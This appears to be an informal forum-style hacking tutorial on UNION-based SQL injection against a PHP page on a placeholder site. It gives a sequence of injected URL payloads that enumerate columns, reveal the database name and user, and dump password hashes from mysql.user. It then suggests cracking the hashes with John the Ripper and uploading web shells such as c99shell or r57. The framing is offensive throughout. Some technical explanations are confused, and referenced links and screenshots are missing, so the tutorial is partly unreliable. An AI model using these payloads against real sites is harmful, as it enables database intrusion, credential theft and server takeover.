This is a vulnerability alot of hackers use, when attacking webservers. By webservers in mean, applications running IIS or Apache, which are commonly used for hosting sites. This attack simply allows an attacker to alter backend SQL statements by manipulating the user input. To learn more about sql injection, there ara alot of white papers on the net that can really help. See these pages,
And many others online
lets take an example on php, aite?
Let say our site is www.sitevulnerable.com/index.php
Index php is vulnerable to sql injection. So how would we attack. www.sitevulnerable.com/index.php?id=-1
Maybe u are asking me why 1, you can use any number 1010101, wateva
The inject above may give an error, and actually these errors are the one i will use to pick up passwords, tables etc.
So we go on by enumerating the tables
www.sitevulnerable.com/index.php?id=-1 union select 1/*
We are using /* to close the query so as to grep in db.
So we will continue adding up like this until we get an output that will help us.
www.sitevulnerable.com/index.php?id=-1 union select 1,2/*
Remember with this we are just grep db of id 1, which probably is root
www.sitevulnerable.com/index.php?id=-1 union select 4,3,2,1/*
and then i get an error like
We are still rolling........
So i will inject a crafted query like this
www.sitevulnerable.com/index.php?id=-1union select 4,DATABASE(),2,USER()/*
And the error i get will be the user name in the DB.
So lets grep the password from the db
www.sitevulnerable.com/index.php?id=-1 union select host,host,2,password from mysql.user/*
And our error is
Now that is an encrypted mysql hash, which can be bruteforced by using john the ripper.
Download from here
So if i get the password, how will i log in to db and upload my files?
Simple, get a running shell, like c99shell, c100, r57 etc etc, they are all over the internet
A simple screenshot is done below.
Hope this helped, signing off,